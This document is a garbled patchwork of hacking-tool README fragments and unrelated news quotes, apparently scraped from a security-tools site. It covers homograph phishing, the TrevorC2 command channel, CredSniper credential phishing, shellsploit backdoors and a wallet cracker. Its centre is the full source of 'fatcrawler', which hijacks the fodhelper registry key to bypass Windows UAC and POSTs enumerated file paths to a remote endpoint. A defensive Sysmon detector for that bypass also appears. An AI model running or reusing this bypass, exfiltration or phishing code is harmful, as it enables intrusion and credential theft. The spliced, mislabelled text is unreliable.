A Unicode domain phishing generator for IDN homograph attacks.
VIDEO DEMO
CLONE
git clone https://github.com/UndeadSec/EvilURL.git
RUNNING
cd EvilURL
python evilurl.py
PREREQUISITES
- python 2.7
Kali Linux - ROLLING EDITION
git clone https://github.com/UndeadSec/EvilURL.git
cd EvilURL
python evilurl.py
Options
-d, --dir-input directory Directory with common crawl index files with .gz extension. Ex: -d "/tmp/cc/"
-v, --ia-dir-input directory Directory with internet archive index files with .gz extension. Ex: -v "/tmp/ia/"
-o, --output-file file Save test results to file. Ex: -o /tmp/results.csv
-u, --update-db Build/Update Paskto DB from Nikto databases.
-n, --use-nikto Use Nikto DBs. Default: true
-e, --use-extras Use EXTRAS DB. Default: true
-s, --scan domain name Domain to scan. Ex: -s "www.google.ca" or -s "*.google.ca"
-i, --cc-index index Common Crawl index for scan. Ex: -i "CC-MAIN-2017-34-index"
-a, --save-all-urls file Save CSV List of all URLS. Ex: -a /tmp/all_urls.csv
-h, --help Print this usage guide.
Examples
Scan domain, save results and URLs $ node paskto.js -s "www.msn.com" -o /tmp/rest-results.csv -a /tmp/all-urls.csv
Scan domain with CC wildcards. $ node paskto.js -s "*.msn.com" -o /tmp/rest-results.csv -a /tmp/all-urls.csv
Scan domain, only save URLs. $ node paskto.js -s "www.msn.com" -o /tmp/rest-results.csv
Scan dir with indexes. $ node paskto.js -d "/tmp/CC-MAIN-2017-39-index/" -o /tmp/rest-results.csv -a /tmp/all-urls.csv
$ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.7s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds
The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command. Arguments to docker run are passed to /bin/nmap, which calls nmap with the args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com):
docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion
Besides nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:
docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion
proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion
docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion
proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion
If you want to call any other command, including the original /usr/bin/nmap, /usr/bin/nc or /usr/bin/curl, you can specify it as the first argument to docker run, e.g.:
docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion
There is an environment variable DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted connections to Tor while waiting for it to boot). Example:
$ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait retry 0] Check socket is open on localhost:9050...
[tor_wait retry 0] Socket OPEN on localhost:9050
[tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
[tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 1] Check socket is open on localhost:9050...
[tor_wait retry 1] Socket OPEN on localhost:9050
[tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
[tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 2] Check socket is open on localhost:9050...
[tor_wait retry 2] Socket OPEN on localhost:9050
[tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
[tor_wait retry 2] SOCKS proxy UP on localhost:9050
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.8s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds
1. trevor2_server.py - edit the file first and customize which website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is a parameter (again, configurable) which contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.
2. trevor2_client.py - all you need in any configurable option is the ability to call out to a website, parse some basic data, execute a command, and then put the results in a base64 encoded query string parameter to the site. That's it, not hard.
pip install -r requirements.txt
python trevor2_server.py
python trevor2_client.py
optional arguments:
-h, --help show this help message and exit
--module MODULE phishing module name - for example, "gmail"
--twofactor enable two-factor phishing
--port PORT listening port (default: 80/443)
--ssl use SSL via Let's Encrypt
--verbose enable verbose output
--final FINAL final url the user is redirected to after phishing is done
--hostname HOSTNAME hostname for SSL
https://<phish site>/creds/view?api_token=<api token>
https://<phish site>/creds/seen/<cred_id>?api_token=<api token>
https://<phish site>/config
{
'enable_2fa': true,
'module': 'gmail',
'api_token': 'some-random-string'
}
Modules are loaded using the --module <name> command to CredSniper. These are loaded from a directory inside /modules. CredSniper is built using Python Flask and all the module HTML templates are rendered using Jinja2.
$ git clone https://github.com/ustayready/CredSniper
$ cd CredSniper
~/CredSniper$ ./install.sh
~/$ cd CredSniper
~/CredSniper$ source bin/activate
(CredSniper) ~/CredSniper$ python credsniper.py --help
"Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet," WikiLeaks says.
As shown in the diagram, the malware implants directly communicate with a fake website, running over commercial VPS (Virtual Private Server), which looks innocent when opened directly in the web browser.
"Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities," WikiLeaks says.
"The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town."
The whistleblowing organisation has released the source code for Project Hive, which is now available for anyone, including investigative journalists and forensic experts, to download and dig into its functionalities.
"Apple engineering teams have even gone and worked with professional mask makers and makeup artists in Hollywood to protect against these attempts to beat Face ID," Apple's senior VP of worldwide marketing Phil Schiller said about the Face ID system during the event.
"These are actual masks used by the engineering team to train the neural network to protect against them in Face ID."
"We used a popular 3D printer. The nose was made by a handmade artist. We use 2D printing for other parts (similar to how we tricked Face Recognition 9 years ago). The skin was also hand-made to trick Apple's AI," the firm said.
git clone https://github.com/UltimateHackers/Blazy
cd Blazy
pip install -r requirements.txt
python blazy.py
python fatcrawler.py --dir C:\ --file-type *.txt --endpoint http://localhost --force-uac --verbose
#!/usr/bin/env python
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
"""
The Fat Crawler.

This is a simple file crawler that performs a recursive lookup on the given folder and file type.

The current supported arguments to run this crawler are:
    -d --dir        The start directory path
    -t --file-type  The file type to lookup
    -c --chunck     The chunck size to report to the server
    -e --endpoint   The endpoint to report the enumerated files
    -f --force-uac  Forces an UAC bypass
    -v --verbose    Enables the verbose mode

Note: The script will try to bypass the UAC if the operational system is a "NT family"
and the user has no administrative privileges.

This script was tested on Windows 10, Ubuntu Server 16.10 and Kali Linux only
"""
import argparse
import os
import sys
import fnmatch
import threading
import ctypes
import urllib, urllib2
import logging as log
import subprocess

try:
    import _winreg
except ImportError:
    # Not on Windows: the registry helpers below are only reached when os.name == 'nt'
    pass

parser = argparse.ArgumentParser(prog='fatcrawler', description='The Fat Crawler')
parser.add_argument('-d', '--dir', metavar='', required=True, help='The start directory')
parser.add_argument('-t', '--file-type', metavar='', required=True, help='The file type')
# type=int so the chunk-size comparison below also works when the value comes from the command line
parser.add_argument('-c', '--chunck', metavar='', type=int, default=10, help='The chunck size to report to the server')
parser.add_argument('-e', '--endpoint', metavar='', required=True, help='The endpoint url to send the enumerated files')
parser.add_argument('-f', '--force-uac', action='store_true', help='Force UAC bypass')
parser.add_argument('-v', '--verbose', action='store_true', help='Enables the verbose mode')

banner = '''
|\_,,____
( o__o \/
/(..) \\ Fat Crawler
(_ )--( _) It'll swallow everything
/ ""--"" \\
,===,=| |-,,,,-| |==,==
| | WW | WW |
| | | | | |
[k1dd0] - v1
'''

# Windows constants
REG_PATH = r"Software\Classes\ms-settings\shell\open\command"
CMD = r"C:\Windows\system32\cmd.exe"
FOD_HELPER = r"C:\Windows\system32\fodhelper.exe"
PYTHON_EXE = r"C:\Python27\python.exe"
DEFAULT_REG_KEY = '(default)'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'


def is_running_as_admin():
    '''
    Checks if the script is running with administrator privileges.
    Returns True if is running as admin, False otherwise.
    '''
    if os.name == 'nt':
        try:
            return ctypes.windll.shell32.IsUserAnAdmin()
        except Exception:
            return False
    else:
        return os.getuid() == 0


def create_reg_key(key, value):
    '''
    Tries to create a reg key
    '''
    try:
        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
        _winreg.CloseKey(registry_key)
    except WindowsError:
        raise


def bypass_uac(runner):
    '''
    Tries to bypass the UAC
    '''
    try:
        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
        create_reg_key(DEFAULT_REG_KEY, runner)
    except WindowsError:
        log.info('[!] FATAL: could not bypass the UAC')
        raise


def report_data(endpoint, files):
    '''
    Performs a POST request on the given endpoint
    '''
    data = urllib.urlencode({'files': files})
    req = urllib2.Request(endpoint, data)
    urllib2.urlopen(req)


def execute(args):
    '''
    Executes the fat crawler
    '''
    if args.verbose:
        log.basicConfig(format='%(message)s', level=log.DEBUG)
    log.info(banner)
    log.info('[+] Checking for privileged access...')
    if not is_running_as_admin():
        log.info('[+] The script is not running with administrative privileges')
        log.info('[+] Checking the operational system...')
        log.info('[+] OS: {}'.format(os.name))
        if os.name == 'nt' and args.force_uac:
            log.info('[+] Trying to bypass the UAC')
            try:
                current_dir = os.path.dirname(os.path.realpath(__file__)) + r'\fatcrawler.py'
                # command line that re-launches this script with the original arguments
                runner = PYTHON_EXE + ' ' + current_dir + ' ' + ' '.join(sys.argv[1:])
                bypass_uac(runner)
                subprocess.Popen(FOD_HELPER)
                sys.exit(0)
            except WindowsError:
                log.info('[!] Could not operate in UAC bypass force mode')
                sys.exit(1)
        else:
            log.info('[+] Nothing to do, skipping UAC bypass')
    else:
        log.info('[+] The script is running with administrative privileges!')

    files = []
    for root, dirnames, filenames in os.walk(args.dir):
        for filename in fnmatch.filter(filenames, args.file_type):
            file_path = os.path.join(root, filename)
            files.append(file_path)
            log.info('[+] File found: {}'.format(file_path))
            if len(files) == args.chunck:
                files_copy = list(files)
                thread = threading.Thread(target=report_data, args=(args.endpoint, files_copy))
                thread.start()
                files = []

    # check if there is any file left
    if len(files) > 0:
        log.info('[+] Preparing to shutdown, flushing the file list...')
        files_copy = list(files)
        thread = threading.Thread(target=report_data, args=(args.endpoint, files_copy))
        thread.start()
        files = []

    log.info('[+] Shutting down the fat crawler')
    log.info('[+] Bye')
    sys.exit(0)


if __name__ == '__main__':
    try:
        args = parser.parse_args()
        execute(args)
    except KeyboardInterrupt:
        sys.exit(0)
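A defender-side counterpart to the bypass_uac() routine above, added here as an example and not part of the fatcrawler tool: it scans constructed Sysmon-style registry events (Event ID 13, value set) for the two writes under the HKCU ms-settings command key that fodhelper.exe honours, and alerts only when a single process has set both DelegateExecute and (Default). The JSON field names follow Sysmon's RegistryEvent; the SID, user name and paths in the sample are constructed.

```python
import json
import re

# Registry path fatcrawler writes (its REG_PATH), as Sysmon logs it under HKU\<SID> or HKCU.
FODHELPER_KEY_RE = re.compile(
    r"(?:HKU\\[^\\]+|HKCU)\\Software\\Classes\\ms-settings\\shell\\open\\command\\"
    r"(DelegateExecute|\(Default\))$",
    re.IGNORECASE,
)

# Constructed sample events in the shape of Sysmon Event ID 13 (RegistryEvent, value set).
# SID, user name and paths are made up for this example.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 13, "EventType": "SetValue", "Image": r"C:\Python27\python.exe",
                "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ms-settings"
                                r"\shell\open\command\DelegateExecute", "Details": ""}),
    json.dumps({"EventID": 13, "EventType": "SetValue", "Image": r"C:\Python27\python.exe",
                "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ms-settings"
                                r"\shell\open\command\(Default)",
                "Details": r"C:\Python27\python.exe C:\Users\victim\fatcrawler.py --dir C:\ --force-uac"}),
    # Benign file-association write by Explorer: must not alert.
    json.dumps({"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\explorer.exe",
                "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\.txt\(Default)",
                "Details": "txtfile"}),
    # Process-creation event (ID 1): not a registry write, ignored here.
    json.dumps({"EventID": 1, "Image": r"C:\Windows\System32\fodhelper.exe"}),
    "this line is not JSON and is skipped",
]


def parse_registry_event(line):
    """Return the event dict if the line is a Sysmon value-set event (ID 13), else None."""
    try:
        ev = json.loads(line)
    except ValueError:
        return None
    if not isinstance(ev, dict) or ev.get("EventID") != 13:
        return None
    return ev


def detect_fodhelper_abuse(lines):
    """Alert once per (process image, key) that set both DelegateExecute and (Default)
    under the ms-settings command key: that pair is what fodhelper.exe auto-elevates."""
    writes = {}  # (image, key) -> {value name in lower case: data written}
    for line in lines:
        ev = parse_registry_event(line)
        if ev is None:
            continue
        target = ev.get("TargetObject", "")
        m = FODHELPER_KEY_RE.search(target)
        if not m:
            continue
        key = target[: -(len(m.group(1)) + 1)]  # strip "\<value name>" to get the key path
        entry = writes.setdefault((ev.get("Image", "unknown"), key), {})
        entry[m.group(1).lower()] = ev.get("Details", "")
    alerts = []
    for (image, key), values in sorted(writes.items()):
        if "delegateexecute" in values and "(default)" in values:
            alerts.append({"image": image, "key": key, "command": values["(default)"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_fodhelper_abuse(SAMPLE_EVENTS):
        print("[!] fodhelper UAC-bypass staging by %s -> %s" % (alert["image"], alert["command"]))
```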
usage: cmspoc.py [-h] -t TYPE -s SCRIPT -u URL
optional arguments:
-h, --help show this help message and exit
-t TYPE, --type TYPE e.g., phpcms
-s SCRIPT, --script SCRIPT Select script
-u URL, --url URL Input a target url
USAGE:
hashrat [options] [paths]...
Hash things: hashrat [options] [paths to hash]
Check hashes: hashrat -c [options] [paths to hash]
Find files matching: hashrat -m [options] [paths to hash]
Find duplicate files: hashrat -dups [options] [paths to hash]
Options:
--help Print this help
-help Print this help
-? Print this help
--version Print program version
-version Print program version
-type Use hash algorithm . Types can be chained together as a comma-separated list.
-md5 Use md5 hash algorithm
-sha1 Use sha1 hash algorithm
-sha256 Use sha256 hash algorithm
-sha512 Use sha512 hash algorithm
-whirl Use whirlpool hash algorithm
-whirlpool Use whirlpool hash algorithm
-jh224 Use jh-224 hash algorithm
-jh256 Use jh-256 hash algorithm
-jh384 Use jh-384 hash algorithm
-jh512 Use jh-512 hash algorithm
-hmac HMAC using specified hash algorithm
-8 Encode with octal instead of hex
-10 Encode with decimal instead of hex
-H Encode with UPPERCASE hexadecimal
-HEX Encode with UPPERCASE hexadecimal
-64 Encode with base64 instead of hex
-base64 Encode with base64 instead of hex
-i64 Encode with base64 with rearranged characters
-p64 Encode with base64 with a-z,A-Z and _-, for best compatibility with 'allowed characters' in websites.
-x64 Encode with XXencode style base64.
-u64 Encode with UUencode style base64.
-g64 Encode with GEDCOM style base64.
-a85 Encode with ASCII85.
-z85 Encode with ZEROMQ variant of ASCII85.
-t Output hashes in traditional md5sum, shaXsum format
-trad Output hashes in traditional md5sum, shaXsum format
-bsd Output hashes in bsdsum format
-tag Output hashes in bsdsum format
--tag Output hashes in bsdsum format
-r Recurse into directories when hashing files
-f Hash files listed in
-i Only hash items matching
-x Exclude items matching
-n Truncate hashes to bytes
-c CHECK hashes against list from file (or stdin)
-cf CHECK hashes but only show failures
-C CHECK files against list from file (or stdin) can spot new files
-Cf CHECK files but only show failures
-m MATCH files from a list read from stdin.
-lm Read hashes from stdin, upload them to a memcached server (requires the -memcached option).
-X In CHECK or MATCH mode only examine executable files.
-exec In CHECK or MATCH mode only examine executable files.
-dups Search for duplicate files.
-memcached Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-mcd Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-h
hookscripts are passed the path of the appropriate file as an argument. In ‘find duplicates’ mode a second argument is passed, which is the duplicate file.
Hashrat can also detect if it's being run under any of the following names (e.g., via symlinks)
md5sum run with '-trad -md5'
shasum run with '-trad -sha1'
sha1sum run with '-trad -sha1'
sha256sum run with '-trad -sha256'
sha512sum run with '-trad -sha512'
jh224sum run with '-trad -jh224'
jh256sum run with '-trad -jh256'
jh384sum run with '-trad -jh384'
jh512sum run with '-trad -jh512'
whirlpoolsum run with '-trad -whirl'
hashrat.cgi run in web-enabled 'cgi mode'
“THE FIRST HUMAN TRANSPLANT ON HUMAN CADAVERS HAS BEEN DONE.”
“AND THAT IS THE FINAL STEP FOR THE FORMAL HEAD TRANSPLANT FOR A MEDICAL CONDITION WHICH IS IMMINENT.”
root$ sudo pip install capstone
root$ sudo pip install readline
root$ python setup.py -s/--setup install
root$ shellsploit
root$ python setup.py -s/--setup uninstall
usage: shellsploit [-l] [-p] [-o] [-n]
[--host] [--port]
optional arguments:
-l, --list Show list of backdoors,shellcodes,injectors
-p, --payload Set payload for usage
-n, -nc Declare netcat for usage
--host The connect/listen address
--port The connect/listen port
Inline arguments:
Main Menu:
help Help menu
os Command directly ur computer
use Select Module For Use
clear Clear the menu
show modules Show Modules of Current Database
show backdoors Show Backdoors of Current Database
show injectors Show Injectors(Shellcode,dll,so etc..)
Shellcode Menu:
back Exit Current Module
set Set Value Of Options To Modules
ip Get IP address(Requires net connection)
os Command directly ur computer
clear Clear the menu
disas Disassembly the shellcode(Support : x86/x64)
whatisthis Learn which kind of shellcode it is
iteration Encoder iteration time
generate Generate shellcode
output Save option to shellcode(txt,py,c,cpp,exe)
show encoders List all obfuscation encoders
show options Show Current Options Of Selected Module
Injector Menu:
set Set Value Of Options To Modules
help Help menu
back Exit Current Module
os Command directly ur computer
pids Get PID list of computer
getpid Get specific PID on list(Ex. getpid Python)
python generuj.py -s "first,second,third"
python generuj.py -v input.txt
python generuj.py -min 8 -s "1,2,3,4,5,6,7,8,9,0"
python generuj.py -max 4 -s "1,2,3,4,5,6,7,8,9,0"
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b 1234567890 -d 2
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b @#! -d 3
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b ASCII -d 4
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b 1234567890 -d 2 -z start.txt
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -b 1234567890 -d 2 -k end.txt
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -w wordlist_01.txt
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -z start.txt -w wordlist_01.txt
python louskac.py -p UTC--2017-07-12T00-06-42.772050600Z--f5751c906091b98be2a6be5ce42c573d704aedab -w wordlist.txt -k end.txt
"The reason we deleted those files and will delete similar ones in the future is two-fold; we do not need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials," Kaspersky Lab report reads.
"Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."
"Given that system owner's potential clearance level, the user could have been a prime target of nation states," the Kaspersky report reads.
"Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands."
More details on the backdoor can be found here.
You can build fatcat this way:
mkdir build
cd build
cmake ..
make
And then install it:
make install
Usage:
fatcat disk.img [options]
You can specify an offset in the file with -O, which can be useful if there are multiple partitions on a block device, for instance:
fatcat disk.img -O 1048576 [options]
This will tell fatcat to begin on the 1048576th byte. Have a look at the partition tutorial.
You can list the filesystem contents with the -l option like this:
$ fatcat disk.img -l /
Listing path /
Cluster: 2
d 24/10/2013 12:06:00 some_directory/ c=4661
d 24/10/2013 12:06:02 other_directory/ c=4662
f 24/10/2013 12:06:40 picture.jpg c=4672 s=532480 (520K)
f 24/10/2013 12:06:06 hello.txt c=4671 s=13 (13B)
You can also provide a path like -l /some/directory.
Using -L, you can provide a cluster number instead of a path, which may be useful sometimes.
If you add the -d option, you will also see deleted files.
Each line starts with f or d to tell if the line concerns a file or a directory. c= indicates the cluster number, s= indicates the size in bytes (which should be the same as the pretty size just after). An h letter at the end indicates that the file is supposed to be hidden. A d letter at the end indicates that the file was deleted.
Using -r, the file will be written on the standard output:
$ fatcat disk.img -r /hello.txt
Hello world!
$ fatcat disk.img -r /picture.jpg > save.jpg
Using -R, you can provide a cluster number instead of a path, but the file size information will be lost and the file will be rounded to the number of clusters it fits, unless you provide the -s option to specify the file size to read.
You can use -x to extract the FAT filesystem directories to a directory:
fatcat disk.img -x output/
If you want to extract from a certain cluster, provide it with -c. If you add -d to extract, deleted files will be extracted too.
You can list deleted files and directories using -d:
$ fatcat disk.img -l / -d
f 24/10/2013 12:13:24 delete_me.txt c=5764 s=16 (16B) d
You can explore and spot a file or an interesting deleted directory, then use -r to read it. Note that the produced file will be read contiguously from the original FAT system and may be broken.
# If your deleted directory cluster is 71829
fatcat disk.img -x output/ -c 71829
See also: undelete tutorial
If your disk is damaged, first use ddrescue and save your disk to another one or into a sane file. Unreadable sectors will appear as 0s in the ddrescue image. Then try -l as above and check -i to find out if fatcat recognizes the disk as a FAT system. Use -2 to check if the two file allocation tables differ, and if they look mergeable. It is very likely that they will be mergeable; in this case, you can try -m to merge the FAT tables. Don't forget to back them up before (see below).
fatcat provides you an option to find orphaned nodes: it will do an automated analysis of your system and explore allocated sectors of your filesystem. This is done with -o.
There is 2 orphaned elements:
Directory clusters 4592 to 4592: 2 elements, 49B
File clusters 4611 to 4611: ~512B
You can then use directly -L and -R to have a look into those files and directories:
$ fatcat disk.img -L 4592
Listing cluster 4592
Cluster: 4592
d 23/10/2013 17:45:06 ./ c=4592
d 23/10/2013 17:45:06 ../ c=0
f 23/10/2013 17:45:22 poor_orphan.txt c=4601 s=49 (49B)
Note that orphan files have an unknown size; this means that if you read one, you will get a file that is a multiple of the cluster size.
You can use fatcat to hack your FAT filesystem. The -i flag will provide you a lot of information about the filesystem:
fatcat disk.img -i
This will give you header data like sector sizes, FAT sizes, disk label etc. It will also read the FAT table to estimate the usage of the disk.
You can inspect a cluster with -@:
fatcat disk.img -@ 1384
This will give you the cluster address (offset of the cluster in the filesystem) and the value of the next cluster in the two FAT tables.
Use -b to backup your FAT tables:
fatcat disk.img -b backup.fats
And use -p to write it back:
fatcat disk.img -p backup.fats
You can write on the FAT with -w and -v:
fatcat disk.img -w 123 -v 124
This will write 124 as value of the next cluster of 123.
You can choose the table with -t: 0 is both tables, 1 is the first and 2 the second.
You can compare the two FATs using -2:
# Watching the diff
$ fatcat disk.img -2
Comparing the FATs
FATs are exactly equals
# Writing 123 in the 500th cluster only in FAT1
$ fatcat disk.img -w 500 -v 123 -t 1
Writing next cluster of 500 from 0 to 123
Writing on FAT1
# Watching the diff
$ fatcat disk.img -2
Comparing the FATs
[000001f4] 1:0000007b 2:00000000
FATs differs
It seems mergeable
You can merge two FATs using -m. For each differing entry in the table, if one is zero and not the other, the non-zero value will be chosen:
$ fatcat disk.img -m
Begining the merge...
Merging cluster 500
Merge complete, 1 clusters merged
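The -2 and -m behaviour just described, implemented in Python as an added illustration (this is not fatcat's own code): two constructed FAT16 tables diverge in exactly one entry, as in the -w 500 -v 123 -t 1 experiment above, and the merge keeps the non-zero side. The "mergeable" test (every divergence has one zero side), the sample chains and the chain walker are assumptions of this example, not fatcat internals.

```python
import struct

FAT16_FREE = 0x0000
FAT16_EOC_MIN = 0xFFF8   # FAT16: any next-cluster value >= 0xFFF8 marks the end of a chain


def build_sample_fats(n_clusters=512):
    """Construct two raw FAT16 tables (little-endian 16-bit entries) as they sit on disk.
    Both hold the same chains; FAT1 additionally has cluster 500 -> 123, mirroring the
    page's 'fatcat disk.img -w 500 -v 123 -t 1' step. All values are made up for this example."""
    fat = [FAT16_FREE] * n_clusters
    fat[0], fat[1] = 0xFFF8, 0xFFFF        # reserved entries (media descriptor, dirty flags)
    fat[2] = 0xFFFF                        # some_directory/: one cluster
    fat[3] = 0xFFFF                        # hello.txt: one cluster
    fat[4], fat[5], fat[6] = 5, 6, 0xFFFF  # picture.jpg: chain 4 -> 5 -> 6 -> end of chain
    raw2 = struct.pack("<%dH" % n_clusters, *fat)
    fat[500] = 123                         # written only into FAT1
    raw1 = struct.pack("<%dH" % n_clusters, *fat)
    return raw1, raw2


def unpack_fat16(raw):
    """Decode a raw FAT16 table into a list of next-cluster values."""
    return list(struct.unpack("<%dH" % (len(raw) // 2), raw))


def compare_fats(fat1, fat2):
    """Like fatcat -2: (cluster, value in FAT1, value in FAT2) for every differing entry."""
    return [(i, a, b) for i, (a, b) in enumerate(zip(fat1, fat2)) if a != b]


def format_diff(diff):
    """Render one difference in fatcat's '[cluster] 1:value 2:value' hex style."""
    i, a, b = diff
    return "[%08x] 1:%08x 2:%08x" % (i, a, b)


def is_mergeable(diffs):
    """The 'It seems mergeable' condition assumed here: each divergence has exactly one zero side."""
    return all((a == FAT16_FREE) != (b == FAT16_FREE) for _, a, b in diffs)


def merge_fats(fat1, fat2):
    """Apply the -m rule: where the tables differ and one side is zero, keep the non-zero one.
    Returns (merged table, number of clusters merged); refuses conflicting non-zero entries."""
    diffs = compare_fats(fat1, fat2)
    if not is_mergeable(diffs):
        raise ValueError("FATs differ in non-zero entries; not mergeable automatically")
    merged = list(fat1)
    for i, a, b in diffs:
        merged[i] = a if a != FAT16_FREE else b
    return merged, len(diffs)


def follow_chain(fat, start):
    """Walk a cluster chain from `start` (what repeated -@ lookups show) and return its clusters.
    A loop, a free entry or an out-of-range reference means the chain is broken."""
    chain, cur = [], start
    while cur < FAT16_EOC_MIN:
        if cur < 2 or cur >= len(fat) or cur in chain:
            raise ValueError("broken chain at cluster %d" % cur)
        chain.append(cur)
        cur = fat[cur]
    return chain


if __name__ == "__main__":
    fat1, fat2 = (unpack_fat16(r) for r in build_sample_fats())
    diffs = compare_fats(fat1, fat2)
    for d in diffs:
        print(format_diff(d))          # [000001f4] 1:0000007b 2:00000000
    print("It seems mergeable" if is_mergeable(diffs) else "Not mergeable")
    merged, n = merge_fats(fat1, fat2)
    print("Merge complete, %d clusters merged" % n)
    print("picture.jpg chain:", follow_chain(merged, 4))
```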
See also: fixing fat tutorial
You can try to fix the FAT with -f. All the filesystem tree will be walked and the directories that are unallocated in the FAT but that fatcat can read will be fixed in the FAT.
You can find an entry with -e:
fatcat disk.img -e /hello.txt
This will display the address of the entry (not the file itself), the cluster reference and the file size (if not a directory).
You can use -c [cluster] to change the cluster of the entry and the flag -s [size] to change the entry size.
You can use -k to search for a cluster reference.
You can erase unallocated space with -z, or overwrite it using random data using -S.
usage: Cr3d0v3r.py [-h] email
positional arguments:
email Email/username to check
optional arguments:
-h, --help show this help message and exit
cd Cr3dOv3r-master
python -m pip install -r win_requirements.txt
python Cr3dOv3r.py -h
For Linux:
git clone https://github.com/D4Vinci/Cr3dOv3r.git
chmod 777 -R Cr3dOv3r-master
cd Cr3dOv3r-master
pip3 install -r requirements.txt
python Cr3dOv3r.py -h
If you want to add a website to the tool, follow the instructions in the wiki